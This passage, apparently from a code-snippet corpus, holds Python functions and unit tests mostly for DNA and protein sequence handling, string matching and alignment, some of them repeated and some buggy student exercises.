generate_test_strings(nr_strings, alphabet, length):\n for _ in range(0, nr_strings):\n yield rng_string(alphabet, randint(0, length))", "def get_basic_case_combos(str):\n return (str, str.lower(), str.upper(), str.capitalize())", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def question1a(s,t):\n\n anagrams = permutations(t, len(t))\n for anagram in anagrams:\n if anagram:\n if ''.join(anagram) in s:\n return True\n return False", "def make_seq(scaffold, o_dict):\n scaff_name = scaffold[0]\n sequence = []\n \n nice_scaff = \"contigs__\"\n \n scaff_string = str(scaffold)\n while scaffold:\n \n if len(scaffold) == 1:\n #This should never happen!\n paf(\"\\nWARNING: odd number of elements in scaffold!\")\n paf(\"scaffold is: \" + scaff_string)\n nice_scaff += \"WARNING:_odd_number_of_elements_in_scaffold!\"\n sequence.description = scaff_name\n return sequence, nice_scaff\n\n end1 = scaffold.pop(0)\n end2 = scaffold.pop(0)\n \n if end1[0:4] != \"five\" and end1[0:5] != \"three\":\n if end2 in repeat_contigs and end2[0:10] == \"threeprime\":\n #Only attach a repeat if connected by fiveprime end,\n # to avoid creating duplicate copies\n ''' this condition has been removed!\n end1 = scaffold.pop(0)\n end2 = scaffold.pop(0)\n #threeprime ends of repeats are not attached\n if end2[0:4] != \"five\" and end2[0:5] != \"three\": end2 = other_end(end1)\n '''\n \n if \"dummy\" in end2:\n end1 = scaffold.pop(0)\n end2 = scaffold.pop(0)\n\n if end2[0:4] != \"five\" and end2[0:5] != \"three\":\n #This should never happen! \n paf(\"\\nWARNING: scaffold not included in assembly!\")\n paf(\"scaffold is: \" + scaff_string)\n paf(\"end1 is: \" + str(end1))\n paf(\"end2 is: \" + str(end2)+ \"\\n\")\n nice_scaff += \"scaffold.not.included.in.assembly!\" + str(end1) + \".\" + str(end2)\n sequence.description = scaff_name\n return sequence, nice_scaff\n else:\n sequence, nice_scaff = initiate_seq(end2, nice_scaff)\n elif (end2 != \"link_circular\") and (\"dummy\" not in end1):\n sequence, nice_scaff = extend_seq(sequence, end0, end1, o_dict, nice_scaff)\n end0 = end2\n \n sequence.description = scaff_name\n \n return sequence, nice_scaff", "def match_all_cui(s,max_len = 10, Eterm_cui = Eterm_cui):\n if len(s) == 0: \n return []\n sub_label = np.zeros(len(s),dtype = 'int')\n location_term = {}\n i = 0\n while i < len(s):\n for j in range(max_len+1,0,-1):\n temp = ' '.join(s[i:i+j])\n if temp in Eterm_cui:\n sub_label[i:i+j] = 1\n location_term[i] = [Eterm_cui[temp]]\n break#matched maximum string, so break\n i += j\n output = []\n for i in range(len(s)):\n if sub_label[i] == 0:#no match\n output += [s[i]]\n elif i in location_term:\n for cui in location_term[i][: :-1]:\n output += [cui]\n return output", "def isAnchor(context, seen_strings, seen_consts, functions_list, logger):\n case = 1\n max_case = 5\n while case <= max_case:\n # 1. Huge unique string\n if case == 1:\n huge_strings = filter(lambda x: seen_strings.count(x) == 1, filter(lambda x: len(x) >= STRING_HUGE_LIMIT, context.strings))\n if len(huge_strings) >= STRING_HUGE_GROUP:\n logger.debug(\"Found an Anchor: %s ==> Unique HUGE string (%d)\", context.name, len(huge_strings[0]))\n return True, STRING_HUGE_GROUP, huge_strings\n # 2. Unique string with a function name in it\n elif case == 2:\n for unique_str in filter(lambda x: seen_strings.count(x) == 1, context.strings):\n for func_name in functions_list:\n if func_name in unique_str:\n logger.debug(\"Found an Anchor: %s ==> Unique string (%s) containing a function name (%s)\", context.name, unique_str, func_name)\n return True, 1, [unique_str]\n # 3. X unique strings with long length\n elif case == 3:\n unique_long_strings = filter(lambda x: seen_strings.count(x) == 1, filter(lambda x: len(x) >= STRING_LONG_LIMIT, context.strings))\n if len(unique_long_strings) >= STRING_LONG_GROUP:\n logger.debug(\"Found an Anchor: %s ==> %d unique long strings\", context.name, len(unique_long_strings))\n return True, STRING_LONG_GROUP, unique_long_strings\n # 4. X unique strings with medium length\n elif case == 4:\n unique_medium_strings = filter(lambda x: seen_strings.count(x) == 1, filter(lambda x: len(x) >= STRING_MEDIUM_LIMIT, context.strings))\n if len(unique_medium_strings) >= STRING_MEDIUM_GROUP:\n logger.debug(\"Found an Anchor: %s ==> %d unique medium strings\", context.name, len(unique_medium_strings))\n return True, STRING_MEDIUM_GROUP, unique_medium_strings\n # 5. Unique const with high entropy\n elif case == 5:\n unique_complex_consts = filter(lambda x: seen_consts.count(x) == 1, filter(lambda x: rankConst(x, context) >= CONST_COMPLEX_LIMIT, context.consts))\n if len(unique_complex_consts) >= CONST_COMPLEX_GROUP:\n logger.debug(\"Found an Anchor: %s ==> %d unique complex consts: %s\", context.name, len(unique_complex_consts), hex(unique_complex_consts[0]))\n return False, CONST_COMPLEX_GROUP, unique_complex_consts\n case += 1\n # we found nothing if we reached this line\n return False, 0, None", "def seq_align(string1,string2,mismatch_penalty,gap_penalty):\n\n # define 2x2 matrix\n matrix = []\n for i in range(len(string1)+1):\n if i == 0:\n matrix.append(list([gap_penalty * x for x in range(len(string2)+1)]))\n else:\n matrix.append(list([gap_penalty * i if x == 0 else None for x in range(len(string2)+1)]))\n\n # populate matrix by looping through the strings and finding optimal value for each spot\n for i in range(len(string1)):\n for j in range(len(string2)):\n if string1[i] == string2[j]:\n val1 = 0 + matrix[i][j]\n else:\n val1 = mismatch_penalty + matrix[i][j]\n val2 = gap_penalty + matrix[i][j+1]\n val3 = gap_penalty + matrix[i+1][j]\n min_val = min(val1,val2,val3)\n matrix[i+1][j+1] = min_val\n\n\n # define values to use while retracing\n result_str1 = ''\n result_str2 = ''\n i = len(matrix)-1\n j = len(matrix[0])-1\n\n # trace through matrix to find the optimal character alignment\n while i > 0 and j > 0:\n val1 = matrix[i-1][j-1]\n val2 = matrix[i-1][j]\n val3 = matrix[i][j-1]\n min_val = min(val1,val2,val3)\n if val1 == min_val:\n result_str1 += string1[i-1]\n result_str2 += string2[j-1]\n i -= 1\n j -= 1\n elif val2 == min_val:\n result_str1 += \"-\"\n result_str2 += string2[j-1]\n i -= 1\n else:\n result_str1 += string1[i-1]\n result_str2 += \"-\"\n j -= 1\n\n # for any leftover j values\n if i == 0:\n while j > 0:\n result_str1 += '-'\n result_str2 += string2[j]\n j -=1\n\n # for any leftover i values\n if j == 0:\n while i > 0:\n result_str1 += string1[i]\n result_str2 += \"-\"\n i -= 1\n\n return matrix[len(matrix)-1][len(matrix[0])-1], result_str1[::-1], result_str2[::-1]", "def programmer_subsequence(s):\n\n # Base case. Remove all instances where programmer repeats\n s = s.replace('programmerprogrammer', '')\n\n template = {\n 'p': 0,\n 'r': 0,\n 'o': 0,\n 'g': 0,\n 'a': 0,\n 'm': 0,\n 'e': 0\n }\n\n matches = [] # Tuple of start and ends\n i= 0\n P_LENGTH = 9 # Length of the word 'programmer'\n\n k = P_LENGTH # Temp\n while i + k < len(s):\n # Make substring\n sub_s = s[i:i + k]\n\n copy_t = deepcopy(template)\n # Check to see if all chars are contained within string\n for j in range(len(sub_s)):\n if sub_s[j] in ['r', 'm']:\n copy_t[sub_s[j]] += 1 if copy_t[sub_s[j]] < 2 else copy_t[sub_s[j]]\n elif sub_s[j] in copy_t:\n copy_t[sub_s[j]] = 1 \n\n # If we have all values, then inceremnt count and check the next P_LENGTH string\n if sum(copy_t.values()) == P_LENGTH:\n matches.append((i, k))\n i += P_LENGTH\n j = P_LENGTH # Reset J\n else:\n k += 1\n\n return len(matches)", "def coding_strand_to_AA_unit_tests():\n # list of [input, expected output]\n data_list = [\n # pass cases\n [\"ATGCGA\", \"MR\"],\n [\"ATGCCCGCTTT\", \"MPA\"],\n [\"AAA\", \"K\"],\n [\"TTT\", \"F\"],\n [\"CCC\", \"P\"],\n [\"GGG\", \"G\"],\n [\"AAAA\", \"K\"],\n [\"AAAAA\", \"K\"],\n [\"AAAAAA\", \"KK\"],\n [\"CTAGAGTCT\", \"LES\"],\n [\"TTCCTCATCCCG\", \"FLIP\"],\n [\"GGTGGA\", \"GG\"],\n [\"TGAACCCGTAACGCACCTTGG\", \"|TRNAPW\"],\n [\"AGGGCCATTAAT\", \"RAIN\"],\n [\"CCGGAGCCTAGTATA\", \"PEPSI\"],\n ]\n for data in data_list:\n if len(data) == 2:\n print \"input: \" + str(data[0]) + \",\" ,\n print \"expected output: \" + str(data[1]) + \",\",\n o = coding_strand_to_AA(data[0])\n print \"actual output: \" + str(o)\n if o != data[1]:\n print \"## Test Fail Here!\"", "def test_match_can_find_longer_sequences_starting_at_beginning_of_string(self):\n first_three_letters = \"abc\"\n s = \"abcdef\"\n self.assertEqual(__, re.match(first_three_letters, s).group())", "def Ab_seq(RNs):\n seq = []\n for res in range(cf.nkey):\n randi = RNs.getR()\n for i in range(20):\n if randi < cf.cumprob20[i]:\n seq.append(i + 1) # want amino acids between 1 and 20\n break\n return seq", "def solve(chars, length):\n return generate_greedy(generate_string_list(length, chars))", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq, in_frame=False), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_libs_from_seqids(self):\r\n seqids = ['ABC_001', 'DEF_002', 'ABC_003', 'GHI_JKL_001']\r\n self.assertEqual(libs_from_seqids(seqids),\r\n set(['ABC', 'DEF', 'GHI_JKL']))", "def coding_strand_to_AA(dna):\n amino_acid=\"\"\n for i in range(0, len(dna), 3):\n mycodon=dna[i:i+3]\n # print'this is my codon'\n #print mycodon\n for j in range(len(codons)):\n for k in range(len(codons[j])):\n #print codons[j][k]\n if codons[j][k] == mycodon:\n #print aa[j]\n amino_acid += aa[j]\n return amino_acid\n \n #step uno break apart string into groups of three\n #find sequence +find index\n #then connect to amino acids ", "def test_assign_seqs_two_fastas_quals(self):\r\n\r\n # Handles single fasta and single qual\r\n file_data = {}\r\n file_data['fasta_files'] = [self.valid_fasta_file_no_errors,\r\n self.valid_fasta_file_no_errors]\r\n file_data['qual_files'] = [self.valid_qual_file_no_errors,\r\n self.valid_qual_file_no_errors]\r\n file_data['demultiplexed_seqs_f'] = FakeOutFile()\r\n file_data['demultiplexed_qual_f'] = FakeOutFile()\r\n\r\n ids_bcs_added_field = {('AACTCGTCGATG', ''): 's1',\r\n ('AGCAGCACTTGT', ''): 's2', ('ACCGCAGAGTCA', ''): 's3'}\r\n bc_lens = [12]\r\n all_bcs = ['AACTCGTCGATG', 'AGCAGCACTTGT', 'ACCGCAGAGTCA']\r\n keep_barcode = False\r\n barcode_type = \"golay_12\"\r\n max_bc_errors = 1.5\r\n start_index = 1\r\n write_unassigned_reads = False\r\n disable_bc_correction = False\r\n added_demultiplex_field = None\r\n\r\n log_data, bc_freqs, seq_counts, corrected_bc_count =\\\r\n assign_seqs(file_data, ids_bcs_added_field, bc_lens, all_bcs,\r\n keep_barcode, barcode_type, max_bc_errors, start_index,\r\n write_unassigned_reads, disable_bc_correction,\r\n added_demultiplex_field)\r\n\r\n expected_demultiplexed_fasta_seq = '>s1_1 ABCD0001 orig_bc=AACTCGTCGATG new_bc=AACTCGTCGATG bc_diffs=0\\nCAGGACGAGACGAGGTT\\n>s3_2 EFGH0002 orig_bc=ACCGCAGAGTCA new_bc=ACCGCAGAGTCA bc_diffs=0\\nCCAGATTACGAGATTA\\n>s2_3 IJKL0003 orig_bc=AGCAGCACTTGT new_bc=AGCAGCACTTGT bc_diffs=0\\nGACCGATTACGATAACG\\n>s1_4 ABCD0001 orig_bc=AACTCGTCGATG new_bc=AACTCGTCGATG bc_diffs=0\\nCAGGACGAGACGAGGTT\\n>s3_5 EFGH0002 orig_bc=ACCGCAGAGTCA new_bc=ACCGCAGAGTCA bc_diffs=0\\nCCAGATTACGAGATTA\\n>s2_6 IJKL0003 orig_bc=AGCAGCACTTGT new_bc=AGCAGCACTTGT bc_diffs=0\\nGACCGATTACGATAACG\\n'\r\n expected_demultiplexed_qual_seq = '>s1_1 ABCD0001 orig_bc=AACTCGTCGATG new_bc=AACTCGTCGATG bc_diffs=0\\n30 26 11 11 29 20 19 16 24 17 29 28 11 27 14 24 24\\n>s3_2 EFGH0002 orig_bc=ACCGCAGAGTCA new_bc=ACCGCAGAGTCA bc_diffs=0\\n12 14 27 23 22 19 24 18 19 20 28 10 17 14 17 13\\n>s2_3 IJKL0003 orig_bc=AGCAGCACTTGT new_bc=AGCAGCACTTGT bc_diffs=0\\n10 20 16 20 25 27 22 28 16 22 16 18 12 13 16 25 17\\n>s1_4 ABCD0001 orig_bc=AACTCGTCGATG new_bc=AACTCGTCGATG bc_diffs=0\\n30 26 11 11 29 20 19 16 24 17 29 28 11 27 14 24 24\\n>s3_5 EFGH0002 orig_bc=ACCGCAGAGTCA new_bc=ACCGCAGAGTCA bc_diffs=0\\n12 14 27 23 22 19 24 18 19 20 28 10 17 14 17 13\\n>s2_6 IJKL0003 orig_bc=AGCAGCACTTGT new_bc=AGCAGCACTTGT bc_diffs=0\\n10 20 16 20 25 27 22 28 16 22 16 18 12 13 16 25 17\\n'\r\n self.assertEqual(file_data['demultiplexed_seqs_f'].data,\r\n expected_demultiplexed_fasta_seq)\r\n self.assertEqual(file_data['demultiplexed_qual_f'].data,\r\n expected_demultiplexed_qual_seq)\r\n\r\n expected_log_data = {'ACCGCAGAGTCA,s3': 2, 'AACTCGTCGATG,s1': 2,\r\n 'AGCAGCACTTGT,s2': 2}\r\n expected_bc_freqs = {'AACTCGTCGATG': 2, 'AGCAGCACTTGT': 2,\r\n 'ACCGCAGAGTCA': 2}\r\n expected_seq_counts = 6\r\n expected_corrected_bc_count = [0, 0]\r\n\r\n self.assertEqual(log_data, expected_log_data)\r\n self.assertEqual(bc_freqs, expected_bc_freqs)\r\n self.assertEqual(seq_counts, expected_seq_counts)\r\n self.assertEqual(corrected_bc_count, expected_corrected_bc_count)", "def test_sequences(self):\n self.assertEqual(self.t.get_mrna(self.chrom_seq), self.transcript_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq), self.inframe_cds_seq)\n self.assertEqual(self.t.get_cds(self.chrom_seq, in_frame=False), self.cds_seq)\n self.assertEqual(self.t.get_protein_sequence(self.chrom_seq), self.amino_acid)\n self.assertEqual(self.t.get_intron_sequences(self.chrom_seq), self.introns)", "def test_check_fasta_seqs_all_valid(self):\r\n\r\n # Test against all valid data\r\n\r\n sample_barcodes = set(['ACCATACC', 'CCAGATTACG'])\r\n sample_primers = set(['ACATTATTTT', 'TTATTACCGAT'])\r\n total_seq_count = 3\r\n\r\n perc_invalid_chars, perc_barcodes_detected, perc_primers_detected,\\\r\n perc_bcs_seq_start =\\\r\n check_fasta_seqs(self.sample_fasta_fp, sample_barcodes,\r\n sample_primers, total_seq_count)\r\n\r\n expected_perc_invalid_chars = \"%1.3f\" % 0\r\n expected_perc_barcodes_detected = \"%1.3f\" % 0\r\n expected_perc_primers_detected = \"%1.3f\" % 0\r\n\r\n self.assertEqual(perc_invalid_chars, expected_perc_invalid_chars)\r\n self.assertEqual(perc_barcodes_detected,\r\n expected_perc_barcodes_detected)\r\n self.assertEqual(perc_primers_detected,\r\n expected_perc_primers_detected)", "def __init__(self, length, alphabet=IUPAC.unambiguous_dna):\n seq_str = self.SampleLetters(alphabet.letters, length)\n \n Seq.__init__(self, seq_str.upper(), alphabet)", "def generateSubSequences(k, ch):\n seq = [\"\".join(c) for c in itertools.product(ch, repeat = k)]\n# discussion about the best way to do this:\n# https://stackoverflow.com/questions/7074051/what-is-the-best-way-to-generate-all-possible-three-letter-strings\n return seq", "def make_text(chains):\n words = []\n not_end_of_list = True\n # your code goes here\n \n # starts with a capital lettered word from source text\n capitalized_ngrams = []\n for key in chains.keys():\n # check if the first tuple in key[0][0]\n if key[0][0].isupper():\n capitalized_ngrams.append(key)\n \n \n\n selected_keys = list(capitalized_ngrams)\n count = 0\n while not_end_of_list:\n choice_n = choice(selected_keys)\n\n if count == 0:\n words.extend(choice_n)\n \n if chains[choice_n] and count <= 150:\n # as long as there is an option, picks a random element from dict list\n choose_next = choice(chains[choice_n])\n # adds new word to list\n words.append(choose_next)\n # creates a list of keys whose last item in tuple is item from list\n selected_keys = [x for x in chains.keys() if x == tuple([*choice_n[1:], choose_next])]\n # it is possible continues\n if selected_keys:\n pass\n else:\n not_end_of_list = False\n\n count += 1\n \n else:\n not_end_of_list = False\n\n return \" \".join(words)", "def show(seq, alphabet):\n for a in seq:\n if a in alphabet:\n alphabet[a]()", "def compare_multiple_seqs(self):\n import tkMessageBox\n if self.data['DNAseq']=='' or not self.data['DNAseq']:\n tkMessageBox.showwarning(\n \"Compare DNA Sequence\",\n \"Load a DNA sequence first\\nUse the Browse Button\"\n )\n return\n else:\n self.show_comp_sequence.set(1)\n import DNA_sequencing\n if not self.sequ_win:\n #print self,'inDNAtool'\n self.sequ_win=DNA_sequencing.sequencing_window(self)\n self.sequ_win.show_multiple_DNAseq_dialog()\n #self.wait_window(self.sequ_win.si_window)\n return", "def run_example3():\r\n # example for digits\r\n #outcomes = [0, 1, 2, 3]\r\n #outcomes = set([\"Red\", \"Green\", \"Blue\"])\r\n outcomes = [\"Sunday\", \"Mondy\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\"]\r\n \r\n length = len(outcomes)\r\n seq_outcomes = gen_permutations_re(outcomes)\r\n print \"Computed\", len(seq_outcomes), \"sorted sequences of\", str(length) ,\"outcomes\"\r\n #print \"Sequences were\", seq_outcomes\r", "def test_solver(allowed_symbols, len_sequence=3):\n secret_sequence = \"\"\n for _ in range(len_sequence):\n secret_sequence += allowed_symbols[random.randint(0, len_sequence - 1)]\n print('secret:', secret_sequence)\n\n solution = brute_force_solver(allowed_symbols, secret_sequence)\n return solution == tuple(secret_sequence)", "def solution(s):", "def validate_seq(sequence):\n sequence = sequence.strip()\n sequence = sequence.replace(\" \", \"\")\n sequence.upper()\n regex = re.compile('^[ACTGNRYSWKMBDHVEFILPQSXZ]*$', re.I)\n if regex.search(sequence) is not None:\n return True\n else:\n return False", "def dfs(self, s_taken=set(), a_sequence='', b_sequence='', a_index=0, b_index=0):\n if a_index < b_index:\n substring = b_sequence[a_index:]\n s_options = self.search_in_tree(self.a_tree, substring)\n elif a_index > b_index:\n substring = a_sequence[b_index:]\n s_options = self.search_in_tree(self.b_tree, substring)\n else:\n s_options = self.s_options_for_beginning\n\n start = min(a_index, b_index)\n for s in s_options:\n if s in self.combination and s not in s_taken:\n a_string = self.a_strings[s]\n b_string = self.b_strings[s]\n a_sequence_new = a_sequence + a_string\n b_sequence_new = b_sequence + b_string\n a_index_new = a_index + len(a_string)\n b_index_new = b_index + len(b_string)\n end = min(a_index_new, b_index_new)\n if a_sequence_new[start:end] == b_sequence_new[start:end]:\n\n if a_index_new == b_index_new:\n if not self.final_sequence:\n self.final_sequence = a_sequence_new\n else:\n self.final_sequence = min(self.final_sequence, a_sequence_new)\n continue\n\n s_taken_new = s_taken.copy()\n s_taken_new.add(s)\n self.dfs(s_taken_new, a_sequence_new, b_sequence_new, a_index_new, b_index_new)", "def process_strings(self):\n for string in self.input:\n matcher = self.choose_algorithm()\n matcher.find_match(string, self.case_insensitive)\n self.__results = matcher.results\n\n if self.counter:\n self.__results = matcher.counts\n\n if self.__results:\n self.output(string)", "def run_example2():\r\n # example for digits\r\n outcomes = set([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\r\n #outcomes = set([\"Red\", \"Green\", \"Blue\"])\r\n #outcomes = set([\"Sunday\", \"Mondy\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\"])\r\n \r\n length = 2\r\n seq_outcomes = gen_all_sequences(outcomes, length)\r\n print \"Computed\", len(seq_outcomes), \"sorted sequences of\", str(length) ,\"outcomes\"\r\n print \"Sequences were\", seq_outcomes", "def aa_generator_DNA(dnaseq):\n return (translate_DNA_codon(dnaseq[n:n+3])\n for n in range(0, len(dnaseq), 3))", "def check_and_clean_sequence(sequence, alphabet):\n if set(sequence).issubset(alphabet):\n return sequence\n else:\n return cleaning_ambiguous_bases(sequence)", "def translate_sequence(sequence, genetic_code = {'GUC': 'V', 'ACC': 'T', 'GUA': 'V', 'GUG': 'V', 'ACU': 'T', 'AAC': 'N', 'CCU': 'P', 'UGG': 'W', 'AGC': 'S', 'AUC': 'I', 'CAU': 'H', 'AAU': 'N', 'AGU': 'S', 'GUU': 'V', 'CAC': 'H', 'ACG': 'T', 'CCG': 'P', 'CCA': 'P', 'ACA': 'T', 'CCC': 'P', 'UGU': 'C', 'GGU': 'G', 'UCU': 'S', 'GCG': 'A', 'UGC': 'C', 'CAG': 'Q', 'GAU': 'D', 'UAU': 'Y', 'CGG': 'R', 'UCG': 'S', 'AGG': 'R', 'GGG': 'G', 'UCC': 'S', 'UCA': 'S', 'UAA': '*', 'GGA': 'G', 'UAC': 'Y', 'GAC': 'D', 'UAG': '*', 'AUA': 'I', 'GCA': 'A', 'CUU': 'L', 'GGC': 'G', 'AUG': 'M', 'CUG': 'L', 'GAG': 'E', 'CUC': 'L', 'AGA': 'R', 'CUA': 'L', 'GCC': 'A', 'AAA': 'K', 'AAG': 'K', 'CAA': 'Q', 'UUU': 'F', 'CGU': 'R', 'CGC': 'R', 'CGA': 'R', 'GCU': 'A', 'GAA': 'E', 'AUU': 'I', 'UUG': 'L', 'UUA': 'L', 'UGA': '*', 'UUC': 'F'}, start_pos = 0):\n #find first orf\n #first_orf_seq = find_first_orf(sequence)\n\n # ensure sequence is uppercase\n seq = sequence.upper()\n\n #translate the sequence\n protein = \"\"\n for i in range(0, len(seq) - (len(seq) % 3), 3):\n codon = seq[i:i + 3]\n if genetic_code[codon] == \"*\":\n break\n protein += genetic_code[codon]\n return protein", "def has_abba(match_obj):\n\tseq = match_obj.group(0)\n\treturn any(map(lambda x: seq[x] != seq[x + 1] and seq[x + 1] == seq[x + 2] and seq[x] == seq[x + 3], range(len(seq) - 3))) # faster because lazy\n\t# return list(filter(lambda x: seq[x] != seq[x + 1] and seq[x + 1] == seq[x + 2] and seq[x] == seq[x + 3], range(len(seq) - 3)))", "def gene_finder(dna):\n all_orfs_both_strands = find_all_ORFs_both_strands(dna)\n longest_fake_orf = longest_ORF_noncoding(dna, 20)\n for element in all_orfs_both_strands:\n if len(element) > longest_fake_orf:\n a_a_string = coding_strand_to_AA(element)\n else:\n a_a_string = 'not longer than shuffle'\n print(a_a_string)", "def gene_finder(dna):\n viable_strings = []\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# intitialize empty list (for strings)\n viable_amino_acids = []\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# intitialize empty list (for amino acids)\n threshold = longest_ORF_noncoding(dna, 1500)\t\t\t\t\t\t\t\t\t\t\t# sets threshold to longest random dna string\n real_dna = list(find_all_ORFs_both_strands(dna))\t\t\t\t\t\t\t\t\t\t# sets real_dna equal to all the ORFs, both strands\n for i in range(len(real_dna)):\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# searches through all the elements in list real_dna\n \tif len(real_dna[i]) > len(threshold):\t\t\t\t\t\t\t\t\t\t\t\t# compares real string to random string\n \t\tviable_strings.append(real_dna[i])\t\t\t\t\t\t\t\t\t\t\t\t# if real string is longer, adds it to list\n for i in range(len(viable_strings)):\t\t\t\t\t\t\t\t\t\t\t\t\t# searches through all elements in viable_strings\n \ta = coding_strand_to_AA(viable_strings[i])\t\t\t\t\t\t\t\t\t\t\t# translates each string to amino acid sequence\n \tviable_amino_acids.append(a)\t\t\t\t\t\t\t\t\t\t\t\t\t\t# adds amino acids to list\n return viable_amino_acids\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# returns list", "def translate_DNA(dnaseq):\n\n gen = aa_generator_DNA(dnaseq)\n seq = ''\n aa = next(gen, None)\n while aa:\n seq += aa\n aa = next(gen, None)\n return seq", "def is_legit_DNA_sequence(record_seq: str) -> bool:\n nts = {\"A\", \"G\", \"T\", \"C\", \"N\"}\n seq_symbols = {s.upper() for s in record_seq}\n return seq_symbols.issubset(nts)", "def match_all_phrases(self, inphrases):\n# temporary - attempted matches\n attempted_matches = []\n phrase_attempts = {}\n phrase = \"\"\n step = \"A\"\n # ALL full phrases \n for phrase in inphrases:\n phrase_attempts[phrase] = 1\n attempted_matches.append(phrase + ':' + step)\n if phrase in self.cls_phrases:\n match_choices = self.cls_phrases[phrase]\n #return match_choices, attempted_matches, phrase\n return (self.get_list_counts(match_choices), attempted_matches, \n phrase, self.get_most_common(match_choices))\n\n # Normalised version of ALL all full phrases \n phrases = [self.get_normalised_phrase(p) for p in inphrases]\n\n # 3 all prefix trigrams \n step = \"3\"\n for ngram in [p.split()[0:3] for p in phrases if len(p.split()) > 2]:\n phrase = ' '.join(ngram)\n phrase_attempts[phrase] = 1\n attempted_matches.append(phrase + ':' + step)\n if phrase in self.cls_phrases:\n match_choices = self.cls_phrases[phrase]\n return (self.get_list_counts(match_choices), attempted_matches, \n phrase, self.get_most_common(match_choices))\n\n # 2 all prefix bigrams \n step = \"2\"\n for ngram in [p.split()[0:2] for p in phrases if len(p.split()) > 1]:\n phrase = ' '.join(ngram)\n phrase_attempts[phrase] = 1\n attempted_matches.append(phrase + ':' + step)\n if phrase in self.cls_phrases:\n match_choices = self.cls_phrases[phrase]\n return (self.get_list_counts(match_choices), attempted_matches, \n phrase, self.get_most_common(match_choices))\n\n # 1 all valid words \n step = \"1\"\n for phr_elem in phrases:\n #print phr_elem.split()\n for phrase in [w.strip() for w in phr_elem.split() \n if self.isExcluded(w.strip()) == False and w.strip() not in phrase_attempts]:\n #print \"***\", phrase\n phrase_attempts[phrase] = 1\n attempted_matches.append(phrase + ':' + step)\n if phrase in self.cls_phrases:\n match_choices = self.cls_phrases[phrase]\n return (self.get_list_counts(match_choices), attempted_matches, \n phrase, self.get_most_common(match_choices))\n\n return [], attempted_matches, phrase, None", "def coding_strand_to_AA_unit_tests(dna, expected):\n print coding_strand_to_AA(\"ATGCGA\")\n print coding_strand_to_AA(\"ATGCCCGCTTT\")\n print coding_strand_to_AA(\"GGTAAA\")\n print \"input: \" + str(dna) + \", expected output: \" + str(expected) + \", actual output: \" + coding_strand_to_AA(dna)", "def seqDiffs(my_seq):\n return ((m.start(0), m.group()) for m in re.finditer('[A-Z]|_+', my_seq))", "def scan_seq(seq, pattern):\n\n # Look for matches in the sequence\n matches = [str(match.group(1)) for match in re.finditer(pattern, seq)]\n\n # Look for matches in the reverse complementary of the sequence\n revcomp_seq = reverse_complementary(seq)\n matches += [str(match.group(1)) for match in re.finditer(pattern, revcomp_seq)]\n\n return matches", "def cands(inputs):\n # The below could probably be simplified a bit....\n return map(''.join, list(itertools.chain.from_iterable([ map (list, (itertools.permutations(inputs, x))) for x in range(4, len(inputs)+1)])))", "def coding_strand_to_AA(dna):\n dnainp = dna\n protein = ''\n if len(dnainp)<3:\n return \"ERROR: The provided fragment is too short to contain any 